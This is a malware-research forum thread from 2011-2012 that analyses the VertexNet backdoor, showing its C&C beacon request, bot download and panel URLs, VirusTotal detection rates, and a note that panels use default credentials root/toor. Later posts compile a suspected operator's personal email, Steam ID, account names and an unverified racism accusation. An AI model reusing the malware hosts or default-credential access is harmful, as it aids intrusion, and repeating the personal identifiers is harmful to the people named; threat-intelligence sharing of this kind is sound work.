VertexNet (W32/Vertex.A, BackDoor.Vertex)

Forum for analysis and discussion about malware.

VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Sun Sep 11, 2011 5:42 pm

VertexNet is a malware who can be used to steal passwords (keylogger feature) perform http flood attack, download/read/execute files, etc...
The bot got also a 'uninstall' command.
It's coded by a French guys named DarkCoderSc, and for the moment, latest version is 1.2.1

Image

Image

VertexNet malware call home (tasks.php) like this:
Code: Select all
GET /admtriii/v/tasks.php?uid={193c2e9a-7c24-11e0-b0f2-806d6172696f-2140809940} HTTP/1.1
User-Agent: V32
Host: www.cg1.fr
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sun, 11 Sep 2011 13:51:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Phusion_Passenger/3.0.2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.6
Content-Length: 0
Content-Type: text/html

It will call it frequently because this page is also used to recieve orders.
The 'gate' can't be moved off the Vertexnet C&C folder due to php files dependency., so if you find the gate you find the rest.
Default User/Pass are root/toor, but with some magic tricks you can get inside the C&C, like for "www.cg1.fr"

Image

If you want start into malware reversing, VertnetNet is a good one, easy to understand.
Due to lack of features VertexNet is not really used by bad guys, they will prefer more sophisticated malware.

Sample in attach.
VirusTotal: 23/44 >> 52.3%
http://www.virustotal.com/file-scan/rep ... 1315111228
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1409
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 419

Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Tue Sep 13, 2011 2:58 pm

offtopic, seem VertexNet was hacked today and the original exe backdoored.
in attach the 'attack' video, i've see that too late for get a copy of the exe.

Image
sha1 field 'no md5', letters in intergers type.
sure, summer is not yet finished.

vertexnet website lead to 403 forbidden for the moment.
probably a .htaccess with Order Allow,Deny Deny from all
Image
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1409
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 419

Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Tue Dec 20, 2011 10:05 pm

VertexNet Loader
Code: Select all
Bot: http://blackicejoker.kilu.de/vtxnet.exe
C&C: http://blackicejoker.no-ip.biz/VertexNet/

BLACKICEJOKER.NO-IP.BIZ (193.107.17.47)
route: 193.107.17.0/24
descr: Ideal Solution Ltd
origin: AS41947
mnt-by: RU-WEBALTA-MNT
mnt-by: IDEAL-MNT


14/43 >> 32.6%
http://www.virustotal.com/file-scan/rep ... 1324341247

Image
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1409
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 419

Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Thu Dec 29, 2011 10:40 am

I've do a fast graph of the VertexNet coder (without every connections, it would be really big otherwise)
He should take care of what's infos he leave.
DarklCoderSc.png


And the friend Xash (same, not completed, but contrary to DarkCoderSc this guys is really 'dark')
Xash.png
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1409
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 419

Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Sat Jan 07, 2012 12:02 am

Some other 1.2 samples.
Code: Select all
http://ekin0x.hack-free.net/King/

Image
Application.exe: 1/43 >> 2.3%
http://www.virustotal.com/file-scan/rep ... 1325894428
FUD.exe: 13/43 >> 30.2%
http://www.virustotal.com/file-scan/rep ... 1325893404
server1.exe: 2/43 >> 4.7%
http://www.virustotal.com/file-scan/rep ... 1325893343
---
Code: Select all
http://sakiir-hosting.eu/VertexPanel/

Image
Application.exe: 5/43 >> 11.6%
http://www.virustotal.com/file-scan/rep ... 1325892351
CryptedTest.exe: 22/43 >> 51.2%
http://www.virustotal.com/file-scan/rep ... 1325892486
uncrypted.exe: 31/43 >> 72.1%
http://www.virustotal.com/file-scan/rep ... 1325892910
vertex-1-.exe: 32/43 >> 74.4%
http://www.virustotal.com/file-scan/rep ... 1325892910

---
by adding '/upload/ to urls you can find more.
The file stealer.exe found on sakiir-hosting.eu lead to a istealer panel at:
Code: Select all
http://sakir.hack-free.net/Stealer/

Image
searching infos about this 'sakiir':
Code: Select all
Steam account: http://steamcommunity.com/id/Sakiir (Steam ID: STEAM_0:0:36928960)
Mail:  wawandup@gmail.com
Youtube accounts: (really alots) sakiirbrozz352, sakiirbrozz288, etc..
Profiles:
http://www.hackhound.org/forum/user/27927-sakiir/
http://piratologie.org/user-4196.html
http://www.the-s.fr/forum/index.php?/topic/442-presentation-de-sakiir/
http://hackforums.net/archive/index.php/thread-909206-62.html

Seem he have also some connections with french racist guys (sakiir is a racist?)
like: http://steamcommunity.com/id/londale_faf (Steam ID: STEAM_0:0:30953450)
screen here: http://i.imgur.com/CvI6H.png
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1409
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 419

Re: VertexNet (W32/Vertex.A, BackDoor.Vertex)

Postby Xylitol » Fri Jan 20, 2012 5:13 pm

c&c
Code: Select all
http://www.cythisia-botdigz.azok.org/Web%20Panel/upload/


https://www.virustotal.com/file/0f64335 ... /analysis/
You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1409
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 419


Return to Malware

Who is online

Users browsing this forum: ragde and 2 guests